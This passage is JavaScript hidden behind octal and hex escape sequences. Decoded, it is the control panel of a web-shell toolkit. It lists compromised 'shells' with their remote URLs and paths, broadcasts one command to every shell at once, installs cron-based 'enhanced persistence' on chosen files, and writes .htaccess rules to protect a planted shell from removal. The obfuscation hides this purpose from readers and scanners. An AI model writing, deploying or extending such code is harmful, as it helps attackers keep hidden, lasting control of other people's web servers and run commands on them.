9\11\117\142\152\x65\143\164\x2e\145\156\164\162\151\x65\163\50\x72\x65\x73\56\x73\x68\145\x6c\154\163\x29\56\x66\x6f\162\105\x61\x63\x68\50\50\133\x69\144\x2c\x20\x73\150\x65\x6c\154\135\51\40\75\x3e\x20\x7b\xa\x9\x9\11\11\11\x9\x63\x6f\156\163\164\x20\163\164\141\164\x75\163\40\75\40\x73\x68\x65\154\154\x2e\163\x74\141\x74\165\x73\40\x3d\x3d\75\40\x27\141\x63\164\151\166\x65\47\x20\77\40\47\xe2\234\x85\x20\x41\143\164\151\166\x65\47\x20\x3a\x20\x27\342\235\x8c\x20\111\x6e\141\x63\x74\151\166\x65\x27\x3b\12\11\x9\x9\x9\11\x9\143\x6f\x6e\163\164\x20\154\x61\163\x74\x53\x65\x65\x6e\x20\75\x20\156\x65\167\x20\x44\141\x74\x65\50\x73\150\145\154\154\56\154\141\x73\x74\x5f\x73\x65\145\x6e\40\x2a\x20\61\60\x30\60\51\56\x74\x6f\x4c\157\143\141\154\x65\123\164\x72\x69\156\147\50\x29\73\12\11\x9\x9\11\x9\x9\143\157\x6e\x73\164\40\163\150\x65\154\x6c\124\x79\x70\145\40\75\x20\163\x68\145\154\154\x2e\151\x73\x5f\162\x65\155\157\164\x65\x20\x3f\x20\x27\360\x9f\214\x90\x20\x52\x65\x6d\x6f\x74\145\x27\40\x3a\40\x27\360\237\x92\273\40\x4c\157\x63\141\154\x27\73\12\11\x9\x9\11\x9\x9\x63\157\x6e\x73\164\x20\x73\x68\x65\x6c\154\x50\x61\164\x68\x20\75\x20\163\x68\145\x6c\x6c\56\151\163\x5f\x72\145\155\157\x74\145\40\x3f\40\50\163\x68\x65\x6c\x6c\x2e\x72\145\x6d\x6f\x74\x65\x5f\x75\162\x6c\x20\174\x7c\x20\47\x4e\57\x41\x27\x29\40\72\40\50\163\x68\x65\154\154\x2e\x70\x61\x74\x68\40\174\174\40\x27\x4e\x2f\x41\47\51\73\xa\11\x9\x9\11\x9\11\xa\11\x9\x9\11\11\x9\x68\x74\x6d\x6c\x20\x2b\75\40\140\x3c\164\162\76\12\x9\x9\x9\x9\11\x9\x9\74\164\144\x3e\44\173\x73\x68\x65\154\x6c\x54\171\x70\145\175\x3c\x2f\x74\x64\76\xa\11\x9\11\x9\x9\11\x9\x3c\x74\x64\x3e\x24\x7b\164\150\151\163\x2e\145\163\x63\x61\x70\145\110\164\155\x6c\50\x73\x68\x65\154\154\56\x6e\x61\x6d\x65\51\x7d\x3c\57\164\144\76\xa\11\x9\11\11\11\x9\x9\x3c\164\x64\40\163\164\171\154\x65\x3d\x22\x66\x6f\156\164\x2d\146\x61\x6d\x69\x6c\171\x3a\x6d\x6f\x6e\157\x73\160\x61\143\145\x3b\x20\x66\x6f\x6e\x74\55\163\151\x7a\145\72\60\56\70\65\x72\x65\x6d\x3b\40\x77\x6f\162\144\55\142\162\145\141\x6b\72\142\162\x65\141\153\x2d\141\x6c\154\x3b\42\76\x24\x7b\164\x68\x69\163\56\x65\x73\143\141\x70\x65\110\x74\155\x6c\50\x73\x68\x65\x6c\x6c\x50\x61\164\150\x29\x7d\74\x2f\x74\144\x3e\xa\11\x9\11\11\x9\11\x9\x3c\164\x64\x3e\44\173\163\x74\x61\x74\165\x73\x7d\74\x2f\x74\x64\x3e\12\x9\x9\x9\x9\11\11\11\x3c\164\x64\x3e\x24\173\x6c\141\x73\164\123\145\x65\156\175\x3c\x2f\x74\x64\x3e\xa\11\11\11\x9\x9\x9\x3c\x2f\x74\x72\76\x60\73\12\11\x9\11\11\x9\x7d\x29\x3b\xa\x9\x9\11\x9\x9\xa\x9\11\11\11\11\150\164\155\x6c\x20\53\75\x20\x27\x3c\57\x74\x62\157\144\x79\76\74\x2f\x74\x61\142\x6c\x65\76\47\x3b\xa\11\11\11\x9\175\x20\x65\154\x73\145\40\173\12\x9\x9\11\11\x9\x68\164\155\154\x20\53\75\40\x27\x3c\160\x20\163\164\x79\x6c\145\75\42\143\x6f\154\157\162\72\x76\x61\162\50\55\x2d\164\x65\x78\164\x2d\155\145\x64\51\x3b\x22\x3e\x4e\x6f\x20\x73\150\x65\154\x6c\163\40\x72\145\x67\151\x73\164\x65\162\145\144\40\x79\x65\164\x2e\74\x2f\x70\76\x27\73\xa\x9\x9\11\11\x7d\12\11\11\11\11\12\11\11\11\x9\x69\x66\x20\50\x72\145\x73\x75\x6c\x74\x73\105\x6c\51\40\x72\145\163\x75\x6c\x74\x73\105\154\56\151\156\156\x65\162\x48\124\x4d\x4c\40\75\x20\x68\164\x6d\154\x3b\12\x9\x9\x9\11\x74\x68\151\163\56\164\157\141\163\164\x28\x60\x46\x6f\x75\156\144\40\x24\x7b\x72\145\163\56\164\157\x74\x61\154\175\x20\163\150\x65\x6c\154\x28\163\x29\x60\x2c\40\47\163\x75\143\143\x65\163\163\x27\51\x3b\12\11\x9\x9\175\x20\x65\154\163\x65\40\x7b\12\x9\11\x9\x9\x69\x66\x20\50\x72\x65\163\x75\154\x74\x73\x45\x6c\x29\40\x72\x65\163\165\154\164\163\x45\154\x2e\x69\156\156\x65\162\110\x54\115\x4c\x20\75\40\140\74\x70\x20\163\x74\171\x6c\145\x3d\x22\143\157\x6c\157\x72\x3a\x76\141\162\x28\55\55\x61\143\143\145\156\x74\x2d\162\x65\x64\51\x3b\42\x3e\342\235\214\x20\x24\x7b\162\145\163\x3f\56\x6d\145\163\x73\x61\x67\145\40\174\x7c\x20\47\x46\141\151\x6c\145\144\40\x74\x6f\40\154\x69\x73\x74\40\x73\x68\x65\x6c\x6c\163\x2e\x27\175\74\57\x70\76\140\x3b\xa\11\x9\11\x9\x74\x68\151\x73\56\x74\157\x61\x73\x74\x28\x72\x65\x73\77\56\155\x65\x73\163\x61\x67\145\x20\174\x7c\40\47\106\141\151\154\x65\x64\x20\164\x6f\40\x6c\151\163\x74\x20\x73\150\x65\154\x6c\x73\x2e\47\54\40\x27\x65\x72\x72\x6f\162\x27\51\73\xa\x9\11\x9\x7d\12\x9\11\x7d\x2c\12\11\11\12\x9\11\141\x73\171\156\143\40\142\x72\x6f\141\144\143\141\163\x74\x43\x6f\155\155\x61\156\144\50\51\40\x7b\12\x9\x9\11\x63\157\156\163\164\40\143\x6f\x6d\x6d\x61\x6e\x64\40\75\40\144\157\143\165\155\145\x6e\x74\x2e\147\145\164\x45\154\x65\x6d\x65\x6e\x74\102\x79\x49\144\50\x27\142\162\157\x61\144\x63\141\x73\x74\x2d\x63\157\155\155\x61\156\144\x27\x29\77\x2e\x76\141\154\165\145\40\174\174\40\x27\47\73\xa\x9\x9\11\xa\x9\x9\x9\x69\x66\x20\x28\41\x63\x6f\x6d\x6d\141\156\x64\56\x74\162\x69\x6d\50\x29\51\40\x7b\xa\x9\x9\x9\11\164\150\151\163\56\x74\x6f\141\x73\164\50\47\x43\157\155\155\141\x6e\x64\40\151\163\x20\162\145\x71\x75\x69\162\145\144\56\x27\54\40\x27\x65\x72\x72\x6f\162\47\x29\x3b\xa\x9\x9\x9\11\162\145\x74\165\162\x6e\x3b\xa\x9\x9\11\x7d\12\x9\x9\x9\xa\11\x9\x9\x63\157\156\163\164\x20\x72\145\163\165\x6c\164\163\x45\x6c\40\x3d\x20\x64\x6f\143\x75\x6d\x65\x6e\x74\x2e\147\145\164\105\x6c\145\155\x65\x6e\164\x42\x79\x49\144\x28\47\x62\x72\157\141\144\x63\x61\163\x74\55\x72\x65\x73\x75\154\164\163\47\51\x3b\xa\x9\x9\11\151\x66\x20\50\162\x65\x73\x75\154\x74\x73\x45\x6c\51\40\x72\x65\x73\165\x6c\x74\163\x45\x6c\x2e\x69\x6e\156\x65\x72\110\x54\x4d\x4c\x20\x3d\x20\x27\74\x70\x20\x73\164\x79\154\x65\x3d\42\x63\x6f\154\157\162\x3a\166\x61\x72\x28\x2d\55\x61\x63\x63\x65\x6e\x74\x2d\147\x6f\154\144\51\x3b\x22\x3e\102\x72\157\141\144\x63\x61\163\x74\x69\156\147\40\x63\x6f\x6d\x6d\x61\156\x64\x2e\56\x2e\x3c\x2f\x70\76\x27\73\12\11\x9\x9\12\x9\11\x9\x63\x6f\156\163\x74\40\x72\145\x73\40\75\40\141\167\x61\x69\x74\40\x74\150\151\163\56\141\160\x69\x28\47\x6d\165\154\x74\151\137\x73\x68\x65\154\154\x5f\x62\x72\x6f\141\x64\x63\x61\163\164\x27\54\x20\173\x20\x63\x6f\x6d\x6d\141\x6e\144\72\40\x63\157\155\155\x61\156\144\x20\x7d\x29\73\12\11\x9\x9\12\x9\11\11\x69\x66\x20\x28\162\x65\163\40\46\x26\40\162\145\163\56\163\x74\141\164\165\163\40\75\75\x3d\40\x27\x73\x75\x63\143\145\163\x73\47\51\x20\x7b\xa\11\11\11\x9\x6c\x65\164\x20\x68\x74\x6d\154\40\x3d\x20\x60\x3c\x64\151\x76\40\163\164\x79\154\145\x3d\x22\x70\x61\x64\x64\x69\156\x67\72\61\x35\160\170\73\x20\142\141\x63\153\147\x72\x6f\x75\156\x64\x3a\166\x61\162\x28\x2d\55\x62\147\x2d\154\x69\x67\150\x74\51\x3b\40\142\x6f\x72\144\x65\x72\55\x72\141\x64\x69\165\x73\72\66\160\170\x3b\40\x6d\x61\162\x67\x69\156\x2d\142\157\164\164\157\155\x3a\x31\x72\x65\x6d\73\42\76\xa\x9\x9\11\x9\11\74\x73\164\162\157\156\147\76\360\237\223\242\40\105\170\x65\x63\165\x74\145\x64\x20\x6f\x6e\40\44\x7b\x72\145\x73\x2e\x74\x6f\x74\x61\154\x5f\145\170\145\x63\165\164\145\x64\x7d\x20\163\150\145\x6c\154\x28\163\x29\74\57\163\164\x72\x6f\x6e\x67\x3e\xa\x9\x9\11\x9\74\57\144\151\166\x3e\x60\x3b\12\x9\x9\11\11\xa\x9\x9\x9\x9\x69\x66\40\x28\162\145\163\x2e\x72\145\163\165\154\164\163\40\x26\x26\40\117\x62\152\x65\143\x74\56\153\x65\171\x73\x28\162\145\x73\x2e\x72\145\163\x75\154\164\x73\x29\x2e\154\x65\x6e\x67\x74\x68\40\x3e\x20\x30\x29\x20\173\xa\11\11\x9\x9\x9\x4f\142\x6a\145\x63\x74\56\x65\x6e\x74\x72\151\x65\x73\x28\x72\145\x73\56\162\x65\x73\165\x6c\164\163\51\56\x66\x6f\162\105\141\x63\x68\x28\x28\133\151\x64\54\x20\x72\145\x73\x75\x6c\x74\x5d\51\x20\x3d\x3e\x20\x7b\xa\11\x9\11\x9\x9\11\x63\157\x6e\163\x74\x20\163\150\x65\154\154\x54\171\160\145\40\x3d\40\x72\x65\x73\x75\x6c\164\x2e\151\x73\x5f\x72\145\x6d\x6f\164\145\40\77\x20\x27\360\237\x8c\220\40\x52\x65\x6d\157\x74\145\47\x20\x3a\x20\x27\xf0\237\222\273\40\x4c\x6f\143\x61\x6c\47\x3b\12\11\11\11\x9\11\x9\150\x74\155\x6c\40\x2b\x3d\40\140\74\144\x69\x76\x20\x73\164\171\x6c\145\75\x22\160\x61\x64\x64\x69\x6e\x67\x3a\x31\65\x70\170\73\40\x62\x61\143\153\x67\x72\x6f\x75\156\144\72\x76\141\162\x28\55\55\x62\147\55\144\x61\162\x6b\51\73\x20\x62\x6f\x72\x64\145\x72\55\x72\x61\144\x69\x75\x73\72\66\160\170\x3b\x20\x6d\x61\x72\147\151\x6e\x2d\142\157\x74\164\x6f\x6d\x3a\61\x72\x65\155\73\42\76\12\11\11\x9\11\11\x9\11\x3c\163\x74\x72\157\156\x67\x3e\44\173\163\x68\x65\x6c\x6c\x54\x79\160\145\x7d\40\44\x7b\164\150\151\163\56\x65\x73\143\141\x70\145\x48\164\x6d\154\50\x72\145\163\165\154\x74\x2e\156\141\155\x65\x29\x7d\74\x2f\163\164\162\x6f\x6e\147\x3e\x20\50\44\x7b\164\x68\151\x73\x2e\145\163\x63\141\x70\x65\x48\164\x6d\154\50\x72\x65\163\x75\x6c\164\56\x70\141\164\x68\51\175\x29\74\x62\162\x3e\xa\x9\x9\11\x9\11\x9\11\x3c\x73\160\141\156\40\x73\164\x79\x6c\x65\x3d\x22\x63\157\154\157\162\72\44\x7b\162\x65\163\165\x6c\x74\x2e\163\165\x63\143\145\163\x73\x20\x3f\40\47\x76\141\162\x28\55\55\x61\x63\x63\x65\156\164\x2d\x67\x72\x65\145\x6e\x29\x27\40\x3a\40\47\166\x61\162\50\x2d\55\x61\x63\143\x65\156\x74\55\x72\145\144\51\47\x7d\73\42\76\xa\x9\x9\x9\11\x9\11\11\x9\44\x7b\x72\x65\x73\165\x6c\x74\x2e\x73\165\143\x63\145\163\x73\x20\x3f\40\47\342\x9c\x85\40\123\x75\x63\143\x65\163\163\x27\40\72\40\47\xe2\x9d\214\40\106\141\151\x6c\145\144\47\175\xa\x9\11\x9\x9\11\x9\11\74\57\163\160\141\x6e\76\12\x9\x9\x9\x9\11\x9\x9\74\x70\162\145\40\143\x6c\141\163\163\75\x22\157\x75\x74\x70\x75\x74\x2d\142\157\x78\x22\x20\163\164\x79\x6c\145\x3d\x22\155\x61\162\147\151\156\55\164\157\x70\72\60\56\65\x72\145\x6d\73\x20\155\141\x78\55\150\x65\151\147\x68\164\x3a\62\x30\60\x70\x78\x3b\40\x6f\x76\x65\x72\146\154\157\167\x2d\171\x3a\x61\x75\x74\x6f\73\x22\x3e\44\173\164\x68\151\163\56\x65\163\x63\x61\x70\x65\110\x74\155\154\x28\x72\x65\x73\165\154\164\x2e\x72\145\163\x75\x6c\164\x20\174\x7c\x20\47\x4e\x6f\40\157\165\164\x70\165\164\x27\x29\x7d\x3c\x2f\160\162\145\x3e\12\11\x9\x9\11\x9\x9\x3c\57\144\x69\166\x3e\x60\x3b\xa\x9\x9\x9\x9\11\175\51\x3b\xa\11\x9\11\x9\175\xa\x9\x9\11\11\12\11\x9\x9\11\x69\146\40\50\x72\x65\x73\x75\x6c\x74\163\105\x6c\51\x20\162\x65\163\165\154\x74\163\x45\x6c\56\x69\156\156\x65\x72\x48\x54\x4d\114\40\x3d\x20\x68\164\155\x6c\73\xa\11\11\11\11\x74\x68\x69\x73\x2e\x74\x6f\x61\x73\x74\x28\140\105\170\x65\143\165\x74\145\x64\40\x6f\156\40\44\x7b\x72\x65\x73\x2e\x74\157\x74\x61\x6c\137\x65\170\x65\143\x75\x74\x65\x64\x7d\x20\163\x68\145\154\154\x28\163\x29\x60\54\x20\47\x73\165\x63\143\145\x73\x73\x27\51\73\12\x9\11\x9\x7d\x20\x65\154\163\145\40\173\12\x9\11\x9\x9\x69\146\x20\50\162\x65\x73\x75\x6c\164\163\105\154\x29\x20\162\x65\x73\165\154\x74\x73\105\154\x2e\151\156\156\145\162\x48\124\x4d\114\40\75\x20\140\74\x70\40\x73\164\x79\x6c\x65\75\x22\x63\x6f\x6c\157\162\72\166\x61\162\50\x2d\55\x61\143\x63\x65\x6e\x74\x2d\162\x65\144\51\73\42\76\xe2\235\214\x20\x24\173\162\x65\x73\x3f\x2e\155\145\x73\x73\x61\x67\x65\x20\x7c\x7c\x20\x27\x46\x61\x69\154\x65\144\40\164\157\x20\x62\x72\157\x61\x64\x63\x61\163\x74\40\143\x6f\155\155\141\x6e\144\x2e\47\x7d\x3c\x2f\160\76\x60\73\xa\11\11\x9\x9\x74\x68\x69\163\x2e\164\157\141\163\x74\x28\162\x65\x73\x3f\x2e\155\x65\163\x73\141\147\x65\40\174\x7c\40\47\x46\x61\151\154\x65\144\40\x74\x6f\x20\142\162\x6f\x61\144\x63\141\163\164\40\x63\157\x6d\x6d\141\x6e\144\56\x27\x2c\40\47\x65\x72\162\x6f\162\x27\x29\x3b\xa\11\11\x9\175\xa\x9\11\175\x2c\12\11\x9\xa\11\11\x2f\57\x20\105\x6e\150\x61\156\x63\x65\x64\40\120\x65\x72\x73\x69\163\x74\x65\x6e\x63\145\xa\11\x9\141\163\171\x6e\x63\x20\145\x6e\150\x61\156\x63\x65\144\x50\x65\162\x73\x69\x73\164\x65\156\143\145\x28\51\40\173\12\x9\x9\x9\x63\x6f\x6e\x73\164\x20\x74\141\x72\147\x65\164\x50\141\164\150\x73\x20\75\x20\144\157\x63\165\155\145\x6e\x74\56\147\145\164\105\x6c\145\155\x65\156\x74\102\x79\111\144\50\47\160\x65\162\x73\x69\x73\x74\x65\x6e\x63\x65\55\160\141\164\150\x73\47\51\77\56\x76\141\154\165\145\40\174\x7c\40\x27\x27\x3b\12\11\x9\11\x63\157\x6e\163\164\40\x70\x65\x72\x73\x69\163\164\145\x6e\143\x65\124\171\160\145\40\x3d\x20\144\x6f\x63\165\x6d\x65\x6e\164\x2e\147\x65\164\x45\x6c\145\x6d\145\156\x74\x42\x79\111\144\x28\x27\160\x65\x72\x73\151\x73\164\x65\x6e\143\x65\x2d\x74\x79\160\145\47\x29\x3f\x2e\x76\141\x6c\x75\x65\40\x7c\174\x20\47\143\162\x6f\156\x27\x3b\xa\x9\11\11\12\11\x9\x9\x63\157\156\x73\164\40\162\x65\x73\x75\154\164\x73\x45\x6c\40\x3d\x20\144\x6f\143\x75\x6d\145\156\164\x2e\x67\145\164\105\154\x65\155\x65\156\x74\102\x79\x49\144\50\47\145\x6e\150\141\156\x63\x65\144\55\x70\x65\162\x73\151\x73\x74\x65\156\143\x65\x2d\x72\x65\163\165\x6c\164\163\x27\51\73\12\11\11\11\151\146\40\x28\x72\x65\163\x75\154\164\x73\x45\154\51\40\162\x65\163\x75\x6c\x74\163\x45\154\x2e\x69\156\x6e\x65\162\x48\x54\x4d\x4c\40\x3d\x20\47\74\160\x20\163\x74\x79\x6c\x65\x3d\42\x63\x6f\154\157\162\72\166\x61\162\x28\55\55\141\x63\x63\x65\x6e\x74\55\147\x6f\x6c\x64\51\x3b\42\76\111\x6e\x73\164\x61\x6c\x6c\151\x6e\x67\40\x70\145\x72\x73\151\x73\x74\x65\156\143\x65\56\56\x2e\x3c\x2f\x70\x3e\x27\73\xa\x9\11\11\xa\11\11\x9\143\x6f\x6e\x73\x74\x20\x72\x65\x73\x20\x3d\x20\141\x77\x61\151\x74\40\164\150\151\x73\x2e\141\160\x69\50\47\145\156\x68\141\156\143\145\x64\137\x70\145\x72\163\151\163\x74\145\x6e\143\x65\137\x69\156\x73\164\141\x6c\154\x27\54\40\173\x20\x74\x61\162\147\x65\164\137\160\141\x74\x68\x73\x3a\x20\x74\141\162\147\x65\x74\x50\141\164\150\163\x2c\x20\x70\145\162\x73\151\x73\x74\145\x6e\x63\x65\x5f\x74\171\160\x65\72\x20\160\145\162\x73\151\163\x74\145\156\x63\x65\124\171\160\145\40\175\51\73\12\11\x9\x9\12\11\11\x9\x69\x66\x20\x28\x72\145\x73\40\x26\x26\40\x72\145\163\x2e\163\164\141\164\165\x73\40\75\x3d\75\40\x27\163\165\x63\x63\x65\163\163\47\51\40\173\12\11\11\x9\11\154\145\x74\x20\150\x74\x6d\x6c\x20\x3d\40\x60\74\x64\151\x76\x20\x73\164\x79\x6c\145\x3d\42\160\x61\144\x64\151\x6e\147\72\x31\65\x70\170\x3b\40\x62\x61\x63\153\147\162\x6f\x75\x6e\144\72\166\x61\x72\50\x2d\x2d\x62\147\x2d\x6c\151\x67\x68\164\x29\73\40\142\157\x72\144\145\x72\55\x72\141\x64\151\x75\163\72\x36\x70\x78\73\x20\155\141\x72\147\151\x6e\x2d\142\x6f\x74\164\x6f\x6d\72\61\162\x65\x6d\x3b\42\x3e\12\11\x9\11\x9\11\x3c\163\164\162\x6f\x6e\x67\x3e\342\234\x85\x20\x50\x65\162\163\x69\x73\164\145\x6e\143\x65\x20\151\156\163\x74\x61\x6c\154\x65\x64\x20\157\x6e\40\x24\x7b\162\145\x73\56\x69\156\163\164\141\x6c\x6c\x65\x64\x2e\154\x65\156\x67\164\x68\175\40\146\151\x6c\145\50\x73\51\x3c\x2f\163\x74\162\x6f\156\x67\76\12\x9\11\11\x9\74\57\x64\x69\166\76\140\x3b\xa\x9\x9\11\11\12\x9\x9\x9\x9\151\146\x20\x28\x72\x65\163\56\151\x6e\x73\x74\x61\154\x6c\x65\x64\40\46\x26\40\x72\x65\163\x2e\x69\156\x73\x74\141\154\154\145\144\56\x6c\145\x6e\x67\164\150\x20\76\40\60\51\40\x7b\xa\11\11\11\x9\11\x68\164\x6d\154\40\x2b\75\40\x27\74\x68\x34\76\111\156\x73\x74\x61\154\154\145\144\72\74\x2f\150\64\76\47\73\xa\11\11\11\x9\x9\x72\x65\x73\x2e\x69\x6e\x73\x74\141\x6c\154\145\x64\x2e\146\157\162\x45\x61\x63\150\50\151\164\x65\x6d\40\x3d\x3e\40\173\xa\11\x9\x9\11\x9\x9\150\x74\x6d\154\x20\x2b\75\x20\140\x3c\x64\151\166\x20\163\x74\x79\154\145\75\42\x70\x61\144\x64\151\x6e\x67\72\61\60\160\170\x3b\x20\142\141\143\153\147\162\x6f\165\156\144\72\166\141\162\x28\x2d\x2d\142\147\x2d\144\141\x72\x6b\51\x3b\x20\x62\x6f\162\x64\x65\162\55\162\141\x64\x69\165\163\72\x36\x70\x78\x3b\40\155\141\162\x67\x69\x6e\55\142\157\x74\x74\157\x6d\x3a\x30\x2e\65\162\145\155\73\x22\76\xa\x9\x9\x9\11\x9\11\x9\342\x9c\205\x20\x24\173\164\150\151\163\x2e\145\163\143\141\x70\145\x48\x74\155\x6c\x28\151\x74\x65\155\56\160\x61\x74\150\x29\175\40\x28\44\173\x69\164\145\x6d\x2e\x6d\145\x74\150\x6f\x64\x7d\51\xa\x9\11\x9\11\11\11\74\57\x64\151\166\x3e\x60\73\12\11\x9\x9\x9\x9\175\51\x3b\12\11\x9\x9\x9\x7d\12\x9\11\x9\x9\xa\11\11\x9\11\151\146\x20\50\162\x65\163\x2e\x66\x61\151\154\145\x64\40\46\x26\40\162\x65\x73\x2e\x66\141\x69\154\145\144\56\x6c\145\156\x67\x74\x68\40\x3e\x20\x30\51\x20\x7b\xa\x9\x9\x9\11\x9\150\x74\x6d\x6c\x20\x2b\x3d\x20\47\74\150\x34\40\x73\164\x79\x6c\x65\75\x22\143\x6f\154\x6f\162\x3a\x76\141\162\50\x2d\55\141\143\143\x65\156\164\x2d\162\x65\144\x29\x3b\x20\x6d\x61\162\147\151\x6e\55\164\157\160\x3a\61\x72\x65\155\73\x22\x3e\106\141\151\x6c\x65\144\72\74\x2f\150\64\x3e\47\73\12\x9\11\x9\11\11\162\145\163\56\146\141\x69\154\145\x64\56\x66\x6f\x72\105\x61\143\150\x28\151\164\145\x6d\40\x3d\76\40\173\12\x9\x9\x9\11\x9\11\x68\x74\155\x6c\40\x2b\75\40\x60\74\144\x69\166\40\163\x74\x79\x6c\x65\75\42\x70\x61\x64\144\151\156\147\72\x31\x30\160\x78\x3b\40\142\x61\x63\x6b\147\x72\157\x75\156\x64\x3a\166\x61\x72\50\x2d\x2d\x62\x67\x2d\x64\141\x72\153\x29\x3b\40\142\157\x72\x64\145\x72\55\162\141\144\151\165\x73\72\66\x70\x78\73\40\155\x61\162\x67\x69\x6e\x2d\x62\157\x74\164\157\x6d\x3a\x30\x2e\65\x72\145\155\73\x20\x63\x6f\x6c\x6f\x72\72\x76\141\162\50\x2d\55\141\x63\143\145\x6e\164\55\162\x65\x64\x29\73\x22\x3e\xa\11\11\x9\x9\11\x9\11\xe2\235\214\40\x24\x7b\x74\150\151\x73\x2e\x65\163\x63\x61\x70\x65\110\x74\x6d\x6c\50\x69\x74\x65\x6d\56\160\141\164\150\x29\175\x3a\x20\44\x7b\x74\x68\x69\x73\56\x65\x73\x63\141\160\x65\x48\164\x6d\154\x28\151\164\x65\155\x2e\x72\145\141\163\x6f\x6e\51\x7d\xa\11\11\11\x9\11\x9\74\57\x64\151\166\x3e\x60\x3b\12\x9\x9\x9\11\11\175\51\73\xa\11\11\11\11\175\xa\11\11\11\x9\12\x9\11\x9\11\x69\146\40\x28\x72\145\163\165\x6c\164\x73\x45\x6c\51\x20\x72\145\x73\165\x6c\164\x73\105\x6c\56\151\x6e\156\x65\x72\x48\124\115\114\40\75\x20\x68\164\155\x6c\73\xa\x9\x9\11\x9\x74\x68\151\163\x2e\x74\x6f\141\x73\x74\x28\140\x50\145\162\163\x69\x73\x74\145\156\143\x65\40\x69\x6e\x73\x74\141\x6c\154\x65\144\x20\157\x6e\40\x24\x7b\x72\x65\x73\x2e\x69\156\163\164\x61\154\x6c\145\x64\x2e\154\145\x6e\x67\164\x68\175\x20\x66\151\154\x65\x28\163\x29\x60\x2c\x20\x27\163\165\143\x63\145\x73\163\47\51\73\xa\11\11\11\x7d\x20\x65\x6c\x73\x65\x20\x7b\xa\x9\11\11\11\151\146\40\x28\x72\x65\x73\165\x6c\164\x73\x45\x6c\x29\40\x72\x65\163\165\x6c\x74\x73\x45\x6c\x2e\x69\x6e\156\145\162\x48\124\115\114\x20\x3d\40\x60\x3c\x70\40\163\x74\x79\x6c\x65\75\42\x63\x6f\x6c\x6f\162\72\166\x61\x72\x28\x2d\55\x61\143\143\145\156\x74\x2d\162\x65\x64\51\73\42\76\342\235\x8c\40\44\x7b\x72\145\x73\77\x2e\x6d\x65\163\163\x61\x67\x65\40\174\x7c\x20\47\106\141\151\x6c\145\x64\x20\x74\x6f\x20\151\156\x73\164\x61\x6c\x6c\x20\x70\145\162\163\x69\163\x74\x65\x6e\143\145\56\47\x7d\x3c\x2f\x70\76\140\73\12\11\x9\11\x9\x74\x68\151\163\x2e\164\x6f\141\x73\x74\x28\x72\145\163\77\56\155\x65\x73\163\x61\147\145\x20\x7c\174\x20\x27\x46\141\151\154\145\x64\40\x74\x6f\40\x69\x6e\163\x74\141\x6c\x6c\x20\x70\x65\x72\x73\x69\163\164\145\x6e\x63\145\56\47\54\40\x27\145\162\162\157\x72\47\x29\73\12\11\x9\x9\175\xa\x9\x9\175\x2c\12\x9\11\12\x9\11\141\x73\171\x6e\143\40\143\162\145\141\x74\145\110\164\141\143\x63\145\x73\163\50\51\x20\x7b\12\11\x9\x9\143\x6f\156\163\164\x20\163\150\x65\x6c\154\x50\x61\164\x68\40\75\40\x64\x6f\143\165\155\x65\156\x74\x2e\x67\x65\164\105\x6c\145\155\145\x6e\x74\x42\171\x49\x64\50\x27\144\x65\146\x65\156\144\x2d\x73\x68\x65\154\154\55\x70\141\x74\150\x27\x29\x3f\x2e\166\x61\x6c\165\x65\40\x7c\174\x20\x27\x27\x3b\xa\x9\11\x9\x69\146\x20\x28\41\163\x68\x65\x6c\x6c\120\141\164\x68\51\40\173\xa\x9\11\11\11\x74\x68\x69\x73\x2e\164\x6f\141\163\164\50\47\123\150\145\x6c\x6c\40\160\x61\x74\x68\x20\x69\x73\x20\162\x65\161\165\151\x72\145\x64\x2e\47\54\x20\47\x65\162\x72\157\x72\x27\x29\73\xa\x9\x9\x9\11\x72\145\164\165\x72\156\73\xa\x9\11\x9\x7d\xa\x9\x9\11\12\11\11\x9\x63\157\156\x73\164\x20\143\x6f\156\146\151\162\x6d\145\144\x20\75\x20\141\167\141\151\164\40\164\150\x69\x73\56\163\x68\x6f\x77\103\x6f\156\146\151\x72\155\x4d\x6f\x64\x61\x6c\x28\47\x54\150\x69\x73\40\167\151\x6c\154\40\143\x72\x65\x61\164\145\40\x2e\150\164\141\143\x63\x65\163\163\x20\160\162\x6f\x74\145\x63\x74\x69\x6f\x6e\40\146\157\x72\x20\164\x68\x65\x20\163\x68\x65\x6c\154\x2e\40\103\157\156\x74\151\156\165\145\x3f\x27\x2c\x20\x7b\40\x74\171\160\145\72\40\47\x77\x61\162\156\151\x6e\147\47\x20\x7d\51\73\40\151\146\40\x28\x21\143\x6f\156\x66\x69\x72\155\x65\x64\x29\x20\x7b\12\11\11\x9\11\162\x65\164\165\162\x6e\x3b\12\11\11\x9\175\xa\11\11\11\xa\x9\x9\11\x63\x6f\156\x73\164\x20\162\x65\x73\x75\154\164\x73\105\154\40\75\40\x64\157\x63\165\155\145\x6e\164\56\147\145\x74\x45\154\145\155\x65\x6e\164\x42\171\111\x64\x28\47\x64\145\146\145\156\144\x2d\x72\145\x73\x75\154\x74\x73\47\x29\x3b\12\x9\11\11\151\x66\40\x28\x72\x65\163\165\154\164\x73\x45\x6c\x29\40\x72\145\163\x75\154\164\163\105\x6c\x2e\151\156\156\x65\162\110\124\x4d\x4c\40\75\x20\x27\x3c\160\40\x73\164\x79\x6c\145\x3d\42\143\157\154\x6f\162\x3a\x76\141\x72\50\x2d\x2d\x61\x63\x63\145\x6e\x74\55\147\x6f\154\144\x29\x3b\42\76\103\162\145\141\x74\x69\x6e\x67\x20\56\x68\x74\141\x63\x63\x65\x73\x73\40\160\162\x6f\164\x65\x63\164\151\x6f\x6e\56\x2e\x2e\74\57\x70\x3e\x27\73\xa\x9\x9\x9\12\x9\11\11\143\x6f\156\x73\164\40\x72\145\163\x20\x3d\x20\141\x77\141\x69\x74\x20\164\150\151\x73\x2e\x61\160\151\x28\x27\143\x72\x65\x61\164\145\x5f\150\x74\x61\x63\143\145\163\x73\47\x2c\40\x7b\40\x73\150\145\154\154\x5f\160\141\x74\x68\72\40\163\x68\145\154\x6c\120\141\164\150\40\175\51\73\xa\x9\11\11\12\11\x9\x9\151\146\x20\x28\x72\x65\x73\x20\46\x26\x20\x72\x65\x73\56\x73\164\x61\164\x75\163\x20\x3d\75\75\40\x27\x73\x75\143\143\x65\163\163\47\x29\40\173\12\11\11\x9\x9\154\x65\x74\x20\150\164\x6d\x6c\x20\75\x20\x60\74\x64\151\166\x20\163\164\x79\x6c\x65\75\42\x70\141\x64\x64\151\156\x67\72\x31\65\160\x78\73\x20\142\141\x63\x6b\147\x72\x6f\x75\x6e\x64\72\166\x61\x72\x28\55\x2d\x62\147\x2d\154\x69\x67\x68\164\x29\x3b\40\x62\x6f\162\x64\x65\162\x2d\162\141\x64\151\x75\x73